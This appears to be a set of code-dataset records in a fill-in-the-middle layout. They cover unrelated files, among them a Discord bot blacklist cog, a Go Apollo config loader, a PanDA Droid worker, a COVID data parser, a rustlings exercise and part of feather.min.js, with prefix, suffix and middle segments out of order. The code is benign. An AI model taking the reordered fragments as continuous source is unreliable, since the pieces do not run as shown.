Lets you add a user from not being able to use the bot.
"""
try:
user_id = member.id
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
if user_id in blacklist['ids']:
embed = disnake.Embed(
title="Error!",
description=f"**{member.name}** is already in the blacklist.",
color=0xE02B2B
)
return await context.send(embed=embed)
json_manager.add_user_to_blacklist(user_id)
embed = disnake.Embed(
title="User Blacklisted",
description=f"**{member.name}** has been successfully added to the blacklist",
color=0x9C84EF
)
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed.set_footer(
text=f"There are now {len(blacklist['ids'])} users in the blacklist"
)
logger.info(f"{member.name} has been added to the blacklist.")
await context.send(embed=embed)
except:
embed = disnake.Embed(
title="Error!",
description=f"An unknown error occurred when trying to add **{member.name}** to the blacklist.",
color=0xE02B2B
)
await context.send(embed=embed)
@blacklist.command(
name="remove"
)
async def blacklist_remove(self, context, member: disnake.Member = None):
"""
Lets you remove a user from not being able to use the bot.
"""
try:
user_id = member.id
json_manager.remove_user_from_blacklist(user_id)
embed = disnake.Embed(
title="User removed from blacklist",
description=f"**{member.name}** has been successfully removed from the blacklist",
color=0x9C84EF
)
with open("../data/blacklist.json") as file:
blacklist = json.load(file)
embed.set_footer(
text=f"There are now {len(blacklist['ids'])} users in the blacklist"
)
logger.info(f"{member.name} has been removed from the blacklist.")
await context.send(embed=embed)
except:
embed = disnake.Embed(
title="Error!",
description=f"**{member.name}** is not in the blacklist.",
color=0xE02B2B
)
await context.send(embed=embed)
def setup(bot):
bot.add_cog(Owner(bot)) | embed |
init_config.go | package core
import (
"encoding/json"
"github.com/thinmonkey/apollosdk/util"
"io/ioutil"
"os"
"time"
)
type ConfitUtil struct {
ApolloInitConfig
CacheInitConfig
HttpRefreshInterval time.Duration
HttpTimeout time.Duration
HttpOnErrorRetryInterval time.Duration
LongPollingInitDelay time.Duration
LongPollingTimeout time.Duration
configStartFile map[string]interface{}
}
type ApolloInitConfig struct {
AppId string
Cluster string
DataCenter string
MetaServer string
}
type CacheInitConfig struct {
MaxConfigCacheSize int
ConfigCacheExpireTime int
}
func newDefaultConfigUtil() *ConfitUtil {
configUtil := ConfitUtil{
HttpRefreshInterval: 5 * time.Minute,
HttpTimeout: 30 * time.Second,
HttpOnErrorRetryInterval: 1 * time.Second,
LongPollingInitDelay: 2 * time.Second,
LongPollingTimeout: 60 * time.Second,
CacheInitConfig: CacheInitConfig{
MaxConfigCacheSize: 50 * 1024 * 1024,
ConfigCacheExpireTime: 1 * 60,
},
configStartFile: make(map[string]interface{}),
}
return &configUtil
}
func NewConfigWithConfigFile(configFile string) ConfitUtil {
cfg := newDefaultConfigUtil()
cfg.resolveConfig(configFile)
initConfig(cfg)
return *cfg
}
func NewConfigWithApolloInitConfig(config ApolloInitConfig) ConfitUtil {
cfg := newDefaultConfigUtil()
cfg.ApolloInitConfig = config
initConfig(cfg)
return *cfg
}
func (cfg *ConfitUtil) resolveConfig(filename string) {
fs, err := ioutil.ReadFile(filename)
if err != nil {
util.DebugPrintf("Fail to find config file:" + err.Error())
return
}
err = json.Unmarshal(fs, &cfg.configStartFile)
if err != nil {
util.DebugPrintf("Fail to read json config file:" + err.Error())
return
}
}
func initConfig(cfg *ConfitUtil) {
initRefreshTime(cfg)
initHttpTimeout(cfg)
initErrorRetry(cfg)
initCacheExpireTime(cfg)
initMaxCacheSize(cfg)
initLongPollInitDelay(cfg)
initLongpollTimeout(cfg)
initAppId(cfg)
initCluster(cfg)
initDataServer(cfg)
initMetaServer(cfg)
}
func initMetaServer(util *ConfitUtil) | aCenter != "" {
return
}
//其次选择系统环境变量配置
util.DataCenter = os.Getenv("apollo.dataCenter")
}
func initCluster(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.Cluster != "" {
return
}
//其次选择系统环境变量配置
cluster := os.Getenv("apollo.Cluster")
if cluster != "" {
util.Cluster = cluster
return
}
//最后选择配置文件配置
cluster, _ = util.configStartFile["cluster"].(string)
if cluster != "" {
util.Cluster = cluster
return
}
}
func initAppId(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.AppId != "" {
return
}
//其次选择系统环境变量配置
appId := os.Getenv("apollo.appId")
if appId != "" {
util.AppId = appId
return
}
//最后选择配置文件配置
appId, _ = util.configStartFile["appId"].(string)
if appId != "" {
util.AppId = appId
return
}
}
func initLongpollTimeout(util *ConfitUtil) {
longPollingTimeout, _ := util.configStartFile["longPollingTimeout"].(string)
if longPollingTimeout != "" {
util.LongPollingTimeout, _ = time.ParseDuration(longPollingTimeout)
}
}
func initLongPollInitDelay(util *ConfitUtil) {
longPollingInitDelay, _ := util.configStartFile["longPollingInitDelay"].(string)
if longPollingInitDelay != "" {
util.LongPollingInitDelay, _ = time.ParseDuration(longPollingInitDelay)
}
}
func initMaxCacheSize(util *ConfitUtil) {
maxConfigCacheSize, _ := util.configStartFile["maxConfigCacheSize"].(float64)
if maxConfigCacheSize != 0 {
util.MaxConfigCacheSize = int(maxConfigCacheSize)
}
}
func initCacheExpireTime(util *ConfitUtil) {
configCacheExpireTime, _ := util.configStartFile["configCacheExpireTime"].(float64)
if configCacheExpireTime != 0 {
util.ConfigCacheExpireTime = int(configCacheExpireTime)
}
}
func initErrorRetry(util *ConfitUtil) {
onErrorRetryInterval, _ := util.configStartFile["onErrorRetryInterval"].(string)
if onErrorRetryInterval != "" {
util.HttpOnErrorRetryInterval, _ = time.ParseDuration(onErrorRetryInterval)
}
}
func initHttpTimeout(util *ConfitUtil) {
connectTimeout, _ := util.configStartFile["httpTimeout"].(string)
if connectTimeout != "" {
util.HttpTimeout, _ = time.ParseDuration(connectTimeout)
}
}
func initRefreshTime(util *ConfitUtil) {
refreshInterval, _ := util.configStartFile["httpRefreshInterval"].(string)
if refreshInterval != "" {
util.HttpRefreshInterval, _ = time.ParseDuration(refreshInterval)
}
}
| {
//优先选择用户运行时代码设置的
if util.MetaServer != "" {
return
}
//其次选择系统环境变量配置
metaCenter := os.Getenv("apollo.metaServer")
if metaCenter != "" {
util.MetaServer = metaCenter
return
}
//最后选择配置文件配置
metaCenter, _ = util.configStartFile["metaServer"].(string)
if metaCenter != "" {
util.MetaServer = metaCenter
}
}
func initDataServer(util *ConfitUtil) {
//优先选择用户运行时代码设置的
if util.Dat |
Droid.py | import commands
import json
import os
import shutil
import sys
import time
import pickle
import signal
from os.path import abspath as _abspath, join as _join
from pandayoda.yodacore import Interaction,Database,Logger
from EventServer.EventServerJobManager import EventServerJobManager
class Droid:
def __init__(self, globalWorkingDir, localWorkingDir):
self.__globalWorkingDir = globalWorkingDir
self.__localWorkingDir = localWorkingDir
self.__currentDir = None
self.__comm = Interaction.Requester()
self.__tmpLog = Logger.Logger()
self.__esJobManager = None
self.__rank = self.__comm.getRank()
self.__tmpLog.info("Rank %s: Global working dir: %s" % (self.__rank, self.__globalWorkingDir))
self.initWorkingDir()
self.__tmpLog.info("Rank %s: Current working dir: %s" % (self.__rank, self.__currentDir))
self.__poolFileCatalog = None
self.__inputFiles = None
self.__copyInputFiles = None
signal.signal(signal.SIGTERM, self.stop)
def initWorkingDir(self):
# Create separate working directory for each rank
curdir = _abspath (self.__localWorkingDir)
wkdirname = "rank_%s" % str(self.__rank)
wkdir = _abspath (_join(curdir,wkdirname))
if not os.path.exists(wkdir):
os.makedirs (wkdir)
os.chdir (wkdir)
self.__currentDir = wkdir
def postExecJob(self):
if self.__copyInputFiles and self.__inputFiles is not None and self.__poolFileCatalog is not None:
for inputFile in self.__inputFiles:
localInputFile = os.path.join(os.getcwd(), os.path.basename(inputFile))
self.__tmpLog.debug("Rank %s: Remove input file: %s" % (self.__rank, localInputFile))
os.remove(localInputFile)
if self.__globalWorkingDir != self.__localWorkingDir:
command = "mv " + self.__currentDir + " " + self.__globalWorkingDir
self.__tmpLog.debug("Rank %s: copy files from local working directory to global working dir(cmd: %s)" % (self.__rank, command))
status, output = commands.getstatusoutput(command)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
def setup(self, job):
#try:
if True:
self.__poolFileCatalog = job.get('PoolFileCatalog', None)
self.__inputFiles = job.get('InputFiles', None)
self.__copyInputFiles = job.get('CopyInputFiles', False)
if self.__copyInputFiles and self.__inputFiles is not None and self.__poolFileCatalog is not None:
for inputFile in self.__inputFiles:
shutil.copy(inputFile, './')
pfc_name = os.path.basename(self.__poolFileCatalog)
pfc_name = os.path.join(os.getcwd(), pfc_name)
pfc_name_back = pfc_name + ".back"
shutil.copy2(self.__poolFileCatalog, pfc_name_back)
with open(pfc_name, 'wt') as pfc_out:
with open(pfc_name_back, 'rt') as pfc_in:
for line in pfc_in:
pfc_out.write(line.replace('HPCWORKINGDIR', os.getcwd()))
job["AthenaMPCmd"] = job["AthenaMPCmd"].replace('HPCWORKINGDIR', os.getcwd())
self.__esJobManager = EventServerJobManager(self.__rank)
self.__esJobManager.initMessageThread(socketname='EventService_EventRanges', context='local')
self.__esJobManager.initTokenExtractorProcess(job["TokenExtractCmd"])
self.__esJobManager.initAthenaMPProcess(job["AthenaMPCmd"])
return True, None
#except Exception, e:
# errMsg = "Failed to init EventServerJobManager: %s" % str(e)
# self.__esJobManager.terminate()
# return False, errMsg
def getJob(self):
request = {'Test':'TEST'}
self.__tmpLog.debug("Rank %s: getJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('getJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
job = output["job"]
if statusCode == 0:
return True, job
return False, None
def getEventRanges(self):
request = {'nRanges': 1}
self.__tmpLog.debug("Rank %s: getEventRanges(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('getEventRanges',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
eventRanges = output['eventRanges']
if statusCode == 0:
return True, eventRanges
return False, None
def updateEventRange(self, output):
try:
eventRangeID = output.split(",")[1]
except Exception, e:
self.__tmpLog.warnning("Rank %s: failed to get eventRangeID from output: %s" % (self.__rank, output))
self.__tmpLog.warnning("Rank %s: error message: %s" % (self.__rank, str(e)))
request = {"eventRangeID": eventRangeID,
'eventStatus':" finished",
"output": output}
self.__tmpLog.debug("Rank %s: updateEventRange(request: %s)" % (self.__rank, request))
retStatus, retOutput = self.__comm.sendRequest('updateEventRange',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, retStatus, retOutput))
if retStatus:
statusCode = retOutput["StatusCode"]
if statusCode == 0:
return True
return False
def finishJob(self):
request = {'state': 'finished'}
self.__tmpLog.debug("Rank %s: updateJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('updateJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
if statusCode == 0:
return True
return False
def failedJob(self):
request = {'state': 'failed'} | statusCode = output["StatusCode"]
if statusCode == 0:
return True
return False
def waitYoda(self):
self.__tmpLog.debug("Rank %s: WaitYoda" % (self.__rank))
while True:
status, output = self.__comm.waitMessage()
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status:
statusCode = output["StatusCode"]
state = output["State"]
if statusCode == 0 and state == 'finished':
return True
return True
def run(self):
self.__tmpLog.info("Droid Starts")
status, job = self.getJob()
self.__tmpLog.info("Rank %s: getJob(%s)" % (self.__rank, job))
if not status:
self.__tmpLog.debug("Rank %s: Failed to get job" % self.__rank)
self.failedJob()
return -1
status, output = self.setup(job)
self.__tmpLog.info("Rank %s: setup job(status:%s, output:%s)" % (self.__rank, status, output))
if not status:
self.__tmpLog.debug("Rank %s: Failed to setup job(%s)" % (self.__rank, output))
self.failedJob()
return -1
# main loop
failedNum = 0
#self.__tmpLog.info("Rank %s: isDead: %s" % (self.__rank, self.__esJobManager.isDead()))
while not self.__esJobManager.isDead():
#self.__tmpLog.info("Rank %s: isDead: %s" % (self.__rank, self.__esJobManager.isDead()))
#self.__tmpLog.info("Rank %s: isNeedMoreEvents: %s" % (self.__rank, self.__esJobManager.isNeedMoreEvents()))
if self.__esJobManager.isNeedMoreEvents():
self.__tmpLog.info("Rank %s: need more events" % self.__rank)
status, eventRanges = self.getEventRanges()
# failed to get message again and again
if not status:
fileNum += 1
if fileNum > 30:
self.__tmpLog.warning("Rank %s: failed to get events more than 30 times. finish job" % self.__rank)
self.__esJobManager.insertEventRange("No more events")
else:
continue
else:
fileNum = 0
self.__tmpLog.info("Rank %s: get event ranges(%s)" % (self.__rank, eventRanges))
if len(eventRanges) == 0:
self.__tmpLog.info("Rank %s: no more events" % self.__rank)
self.__esJobManager.insertEventRange("No more events")
for eventRange in eventRanges:
self.__esJobManager.insertEventRange(eventRange)
self.__esJobManager.poll()
output = self.__esJobManager.getOutput()
if output is not None:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
time.sleep(2)
self.__esJobManager.flushMessages()
output = self.__esJobManager.getOutput()
while output:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
output = self.__esJobManager.getOutput()
self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
self.postExecJob()
self.__tmpLog.info("Rank %s: finish job" % self.__rank)
self.finishJob()
self.waitYoda()
return 0
def stop(self, signum=None, frame=None):
self.__tmpLog.info('Rank %s: stop signal received' % self.__rank)
self.__esJobManager.terminate()
self.__esJobManager.flushMessages()
output = self.__esJobManager.getOutput()
while output:
self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
self.updateEventRange(output)
output = self.__esJobManager.getOutput()
self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
self.postExecJob()
self.__tmpLog.info("Rank %s: finish job" % self.__rank)
self.finishJob()
self.__tmpLog.info('Rank %s: stop' % self.__rank)
def __del__(self):
self.__tmpLog.info('Rank %s: __del__ function' % self.__rank)
#self.__esJobManager.terminate()
#self.__esJobManager.flushMessages()
#output = self.__esJobManager.getOutput()
#while output:
# self.__tmpLog.info("Rank %s: get output(%s)" % (self.__rank, output))
# self.updateEventRange(output)
# output = self.__esJobManager.getOutput()
#self.__tmpLog.info("Rank %s: post exec job" % self.__rank)
#self.postExecJob()
#self.__tmpLog.info("Rank %s: finish job" % self.__rank)
#self.finishJob()
self.__tmpLog.info('Rank %s: __del__ function' % self.__rank) | self.__tmpLog.debug("Rank %s: updateJob(request: %s)" % (self.__rank, request))
status, output = self.__comm.sendRequest('updateJob',request)
self.__tmpLog.debug("Rank %s: (status: %s, output: %s)" % (self.__rank, status, output))
if status: |
maths.js | "use strict";
Object.defineProperty(exports, "__esModule", { value: true });
var Vector2 = /** @class */ (function () {
function Vector2(x, y) {
this.x = x || 0;
this.y = y || 0;
}
return Vector2;
}());
exports.Vector2 = Vector2;
var Vector3 = /** @class */ (function () {
function Vector3(x, y, z) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
}
return Vector3;
}());
exports.Vector3 = Vector3;
var Vector4 = /** @class */ (function () {
function Vector4(x, y, z, w) {
this.x = x || 0;
this.y = y || 0;
this.z = z || 0;
this.w = w || 0;
}
return Vector4;
}());
exports.Vector4 = Vector4;
var Rectangle = /** @class */ (function () {
function Rectangle(x, y, width, height) {
this.x = x || 0;
this.y = y || 0;
this.width = width || 0;
this.height = height || 0;
}
return Rectangle;
}());
exports.Rectangle = Rectangle;
var NPatchInfo = /** @class */ (function () {
function NPatchInfo(rect, type, l, t, r, b) {
this.sourceRect = rect; | this.right = r;
this.bottom = b;
}
return NPatchInfo;
}());
exports.NPatchInfo = NPatchInfo;
var Ray = /** @class */ (function () {
function Ray(pos, dir) {
this.position = pos || new Vector3(0, 0, 0);
this.direction = dir || new Vector3(0, 0, 0);
}
return Ray;
}());
exports.Ray = Ray;
var RayHitInfo = /** @class */ (function () {
function RayHitInfo(hit, distance, position, normal) {
this.hit = hit;
this.distance = distance;
this.position = position;
this.normal = normal;
}
return RayHitInfo;
}());
exports.RayHitInfo = RayHitInfo; | this.type = type;
this.left = l;
this.top = t; |
nl_authority.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from typing import Any, Dict, List
from pandas import DataFrame, concat, merge
from lib.pipeline import DataSource
from lib.time import datetime_isoformat
from lib.utils import grouped_diff
class NetherlandsDataSource(DataSource):
| def parse_dataframes(
self, dataframes: List[DataFrame], aux: Dict[str, DataFrame], **parse_opts
) -> DataFrame:
# Rename the appropriate columns
data = dataframes[0].rename(
columns={
"Date_of_report": "date",
"Municipality_code": "subregion2_code",
"Municipality_name": "subregion2_name",
"Province": "subregion1_name",
"Total_reported": "confirmed",
"Hospital_admission": "hospitalized",
"Deceased": "deceased",
}
)
# Drop data without a clear demarcation
data = data[~data.subregion1_name.isna()]
data = data[~data.subregion2_code.isna()]
data = data[~data.subregion2_name.isna()]
# Get date in ISO format
data.date = data.date.apply(lambda x: datetime.fromisoformat(x).date().isoformat())
# Make sure the region code is zero-padded and without prefix
data["subregion2_code"] = data["subregion2_code"].apply(lambda x: x[2:])
data = data.drop(columns=["subregion1_name", "subregion2_name"])
data = data.merge(aux["metadata"], on="subregion2_code")
# We only need to keep key-date pair for identification
data = data[["date", "key", "confirmed", "deceased", "hospitalized"]]
# Compute the daily counts
data = grouped_diff(data, ["key", "date"])
# Group by level 2 region, and add the parts
l2 = data.copy()
l2["key"] = l2.key.apply(lambda x: x[:5])
l2 = l2.groupby(["key", "date"]).sum().reset_index()
# Group by country level, and add the parts
l1 = l2.copy().drop(columns=["key"])
l1 = l1.groupby("date").sum().reset_index()
l1["key"] = "NL"
# Output the results
return concat([l1, l2, data]) |
|
types.ts | export interface Options {
// entry path
entry?: string;
// whether to support pc-side component props
pc?: boolean; | } |
|
generated_restore_from_backup_input.go | package client
const (
RESTORE_FROM_BACKUP_INPUT_TYPE = "restoreFromBackupInput"
)
type RestoreFromBackupInput struct {
Resource
BackupId string `json:"backupId,omitempty" yaml:"backup_id,omitempty"`
}
type RestoreFromBackupInputCollection struct {
Collection
Data []RestoreFromBackupInput `json:"data,omitempty"`
client *RestoreFromBackupInputClient
}
type RestoreFromBackupInputClient struct {
kuladoClient *KuladoClient
}
type RestoreFromBackupInputOperations interface {
List(opts *ListOpts) (*RestoreFromBackupInputCollection, error)
Create(opts *RestoreFromBackupInput) (*RestoreFromBackupInput, error)
Update(existing *RestoreFromBackupInput, updates interface{}) (*RestoreFromBackupInput, error)
ById(id string) (*RestoreFromBackupInput, error)
Delete(container *RestoreFromBackupInput) error
}
func | (kuladoClient *KuladoClient) *RestoreFromBackupInputClient {
return &RestoreFromBackupInputClient{
kuladoClient: kuladoClient,
}
}
func (c *RestoreFromBackupInputClient) Create(container *RestoreFromBackupInput) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doCreate(RESTORE_FROM_BACKUP_INPUT_TYPE, container, resp)
return resp, err
}
func (c *RestoreFromBackupInputClient) Update(existing *RestoreFromBackupInput, updates interface{}) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doUpdate(RESTORE_FROM_BACKUP_INPUT_TYPE, &existing.Resource, updates, resp)
return resp, err
}
func (c *RestoreFromBackupInputClient) List(opts *ListOpts) (*RestoreFromBackupInputCollection, error) {
resp := &RestoreFromBackupInputCollection{}
err := c.kuladoClient.doList(RESTORE_FROM_BACKUP_INPUT_TYPE, opts, resp)
resp.client = c
return resp, err
}
func (cc *RestoreFromBackupInputCollection) Next() (*RestoreFromBackupInputCollection, error) {
if cc != nil && cc.Pagination != nil && cc.Pagination.Next != "" {
resp := &RestoreFromBackupInputCollection{}
err := cc.client.kuladoClient.doNext(cc.Pagination.Next, resp)
resp.client = cc.client
return resp, err
}
return nil, nil
}
func (c *RestoreFromBackupInputClient) ById(id string) (*RestoreFromBackupInput, error) {
resp := &RestoreFromBackupInput{}
err := c.kuladoClient.doById(RESTORE_FROM_BACKUP_INPUT_TYPE, id, resp)
if apiError, ok := err.(*ApiError); ok {
if apiError.StatusCode == 404 {
return nil, nil
}
}
return resp, err
}
func (c *RestoreFromBackupInputClient) Delete(container *RestoreFromBackupInput) error {
return c.kuladoClient.doResourceDelete(RESTORE_FROM_BACKUP_INPUT_TYPE, &container.Resource)
}
| newRestoreFromBackupInputClient |
help.py | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
''' help.py '''
from heron.common.src.python.utils.log import Log
from heron.tools.cli.src.python.result import SimpleResult, Status
from heron.tools.common.src.python.utils import config
def create_parser(subparsers):
'''
:param subparsers:
:return:
'''
parser = subparsers.add_parser(
'help',
help='Prints help for commands',
add_help=True)
# pylint: disable=protected-access
parser._positionals.title = "Required arguments"
parser._optionals.title = "Optional arguments"
parser.add_argument(
'help-command',
nargs='?',
default='help',
help='Provide help for a command')
parser.set_defaults(subcommand='help')
return parser
# pylint: disable=unused-argument,superfluous-parens
def run(command, parser, args, unknown_args):
| '''
:param command:
:param parser:
:param args:
:param unknown_args:
:return:
'''
# get the command for detailed help
command_help = args['help-command']
# if no command is provided, just print main help
if command_help == 'help':
parser.print_help()
return SimpleResult(Status.Ok)
# get the subparser for the specific command
subparser = config.get_subparser(parser, command_help)
if subparser:
print(subparser.format_help())
return SimpleResult(Status.Ok)
Log.error("Unknown subcommand \'%s\'", command_help)
return SimpleResult(Status.InvocationError) |
|
iterators2.rs | // iterators2.rs
// In this module, you'll learn some of unique advantages that iterators can offer
// Step 1. Complete the `capitalize_first` function to pass the first two cases
// Step 2. Apply the `capitalize_first` function to a vector of strings, ensuring that it returns a vector of strings as well
// Step 3. Apply the `capitalize_first` function again to a list, but try and ensure it returns a single string
// As always, there are hints below!
pub fn capitalize_first(input: &str) -> String {
let mut c = input.chars();
match c.next() {
None => String::new(),
Some(first) => first.to_uppercase().to_string() + c.as_str(),
}
}
#[cfg(test)]
mod tests {
use super::*;
// Step 1.
// Tests that verify your `capitalize_first` function implementation
#[test]
fn test_success() {
assert_eq!(capitalize_first("hello"), "Hello");
}
#[test]
fn test_empty() |
// Step 2.
#[test]
fn test_iterate_string_vec() {
let words = vec!["hello", "world"];
let capitalized_words: Vec<String> = words.iter().map(|w| capitalize_first(w)).collect();
assert_eq!(capitalized_words, ["Hello", "World"]);
}
#[test]
fn test_iterate_into_string() {
let words = vec!["hello", " ", "world"];
let capitalized_words = words
.iter()
.map(|w| capitalize_first(w))
.fold(String::new(), |acc, w| acc + &w);
assert_eq!(capitalized_words, "Hello World");
}
}
// Step 1
// You need to call something on `first` before it can be collected
// Currently its type is `char`. Have a look at the methods that are available on that type:
// https://doc.rust-lang.org/std/primitive.char.html
// Step 2
// First you'll need to turn the Vec into an iterator
// Then you'll need to apply your function unto each item in the vector
// P.s. Don't forget to collect() at the end!
// Step 3.
// This is very similar to the previous test. The only real change is that you will need to
// alter the type that collect is coerced into. For a bonus you could try doing this with a
// turbofish
| {
assert_eq!(capitalize_first(""), "");
} |
margin_auto_left_child_bigger_than_parent.rs | pub fn | () -> stretch::result::Layout {
stretch::node::Node::new(
stretch::style::Style {
justify_content: stretch::style::JustifyContent::Center,
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(52f32),
height: stretch::style::Dimension::Points(52f32),
..Default::default()
},
..Default::default()
},
vec![&stretch::node::Node::new(
stretch::style::Style {
size: stretch::geometry::Size {
width: stretch::style::Dimension::Points(72f32),
height: stretch::style::Dimension::Points(72f32),
..Default::default()
},
margin: stretch::geometry::Rect { start: stretch::style::Dimension::Auto, ..Default::default() },
..Default::default()
},
vec![],
)],
)
.compute_layout(stretch::geometry::Size::undefined())
.unwrap()
}
| compute |
feather.min.js | ! function (e, n) {
"object" == typeof exports && "object" == typeof module ? module.exports = n() : "function" == typeof define && define.amd ? define([], n) : "object" == typeof exports ? exports.feather = n() : e.feather = n()
}("undefined" != typeof self ? self : this, function () {
return function (e) {
var n = {};
function i(t) {
if (n[t]) return n[t].exports;
var l = n[t] = {
i: t,
l: !1,
exports: {}
};
return e[t].call(l.exports, l, l.exports, i), l.l = !0, l.exports
}
return i.m = e, i.c = n, i.d = function (e, n, t) {
i.o(e, n) || Object.defineProperty(e, n, {
configurable: !1,
enumerable: !0,
get: t
})
}, i.r = function (e) {
Object.defineProperty(e, "__esModule", {
value: !0
})
}, i.n = function (e) {
var n = e && e.__esModule ? function () {
return e.default
} : function () {
return e
};
return i.d(n, "a", n), n
}, i.o = function (e, n) {
return Object.prototype.hasOwnProperty.call(e, n)
}, i.p = "", i(i.s = 80)
}([function (e, n, i) {
(function (n) {
var i = "object",
t = function (e) {
return e && e.Math == Math && e
};
e.exports = t(typeof globalThis == i && globalThis) || t(typeof window == i && window) || t(typeof self == i && self) || t(typeof n == i && n) || Function("return this")()
}).call(this, i(75))
}, function (e, n) {
var i = {}.hasOwnProperty;
e.exports = function (e, n) {
return i.call(e, n)
}
}, function (e, n, i) {
var t = i(0),
l = i(11),
r = i(33),
o = i(62),
a = t.Symbol,
c = l("wks");
e.exports = function (e) {
return c[e] || (c[e] = o && a[e] || (o ? a : r)("Symbol." + e))
}
}, function (e, n, i) {
var t = i(6);
e.exports = function (e) {
if (!t(e)) throw TypeError(String(e) + " is not an object");
return e
}
}, function (e, n) {
e.exports = function (e) {
try {
return !!e()
} catch (e) {
return !0
}
}
}, function (e, n, i) {
var t = i(8),
l = i(7),
r = i(10);
e.exports = t ? function (e, n, i) {
return l.f(e, n, r(1, i))
} : function (e, n, i) {
return e[n] = i, e
}
}, function (e, n) {
e.exports = function (e) {
return "object" == typeof e ? null !== e : "function" == typeof e
}
}, function (e, n, i) {
var t = i(8),
l = i(35),
r = i(3),
o = i(18),
a = Object.defineProperty;
n.f = t ? a : function (e, n, i) {
if (r(e), n = o(n, !0), r(i), l) try {
return a(e, n, i)
} catch (e) {}
if ("get" in i || "set" in i) throw TypeError("Accessors not supported");
return "value" in i && (e[n] = i.value), e
}
}, function (e, n, i) {
var t = i(4);
e.exports = !t(function () {
return 7 != Object.defineProperty({}, "a", {
get: function () {
return 7
}
}).a
})
}, function (e, n) {
e.exports = {}
}, function (e, n) {
e.exports = function (e, n) {
return {
enumerable: !(1 & e),
configurable: !(2 & e),
writable: !(4 & e),
value: n
}
}
}, function (e, n, i) {
var t = i(0),
l = i(19),
r = i(17),
o = t["__core-js_shared__"] || l("__core-js_shared__", {});
(e.exports = function (e, n) {
return o[e] || (o[e] = void 0 !== n ? n : {})
})("versions", []).push({
version: "3.1.3",
mode: r ? "pure" : "global",
copyright: "© 2019 Denis Pushkarev (zloirock.ru)"
})
}, function (e, n, i) {
"use strict";
Object.defineProperty(n, "__esModule", {
value: !0
});
var t = o(i(43)),
l = o(i(41)),
r = o(i(40));
function o(e) {
return e && e.__esModule ? e : {
default: e
}
}
n.default = Object.keys(l.default).map(function (e) {
return new t.default(e, l.default[e], r.default[e])
}).reduce(function (e, n) {
return e[n.name] = n, e
}, {})
}, function (e, n) {
e.exports = ["constructor", "hasOwnProperty", "isPrototypeOf", "propertyIsEnumerable", "toLocaleString", "toString", "valueOf"]
}, function (e, n, i) {
var t = i(72),
l = i(20);
e.exports = function (e) {
return t(l(e))
}
}, function (e, n) {
e.exports = {}
}, function (e, n, i) {
var t = i(11),
l = i(33),
r = t("keys");
e.exports = function (e) {
return r[e] || (r[e] = l(e))
}
}, function (e, n) {
e.exports = !1
}, function (e, n, i) {
var t = i(6);
e.exports = function (e, n) {
if (!t(e)) return e;
var i, l;
if (n && "function" == typeof (i = e.toString) && !t(l = i.call(e))) return l;
if ("function" == typeof (i = e.valueOf) && !t(l = i.call(e))) return l;
if (!n && "function" == typeof (i = e.toString) && !t(l = i.call(e))) return l;
throw TypeError("Can't convert object to primitive value")
}
}, function (e, n, i) {
var t = i(0),
l = i(5);
e.exports = function (e, n) {
try {
l(t, e, n)
} catch (i) {
t[e] = n
}
return n
}
}, function (e, n) {
e.exports = function (e) {
if (void 0 == e) throw TypeError("Can't call method on " + e);
return e
}
}, function (e, n) {
var i = Math.ceil,
t = Math.floor;
e.exports = function (e) {
return isNaN(e = +e) ? 0 : (e > 0 ? t : i)(e)
}
}, function (e, n, i) {
var t;
/*!
Copyright (c) 2016 Jed Watson.
Licensed under the MIT License (MIT), see
http://jedwatson.github.io/classnames
*/
/*!
Copyright (c) 2016 Jed Watson.
Licensed under the MIT License (MIT), see
http://jedwatson.github.io/classnames
*/
! function () {
"use strict";
var i = function () {
function e() {}
function n(e, n) {
for (var i = n.length, t = 0; t < i; ++t) l(e, n[t])
}
e.prototype = Object.create(null);
var i = {}.hasOwnProperty;
var t = /\s+/;
function l(e, l) {
if (l) {
var r = typeof l;
"string" === r ? function (e, n) {
for (var i = n.split(t), l = i.length, r = 0; r < l; ++r) e[i[r]] = !0
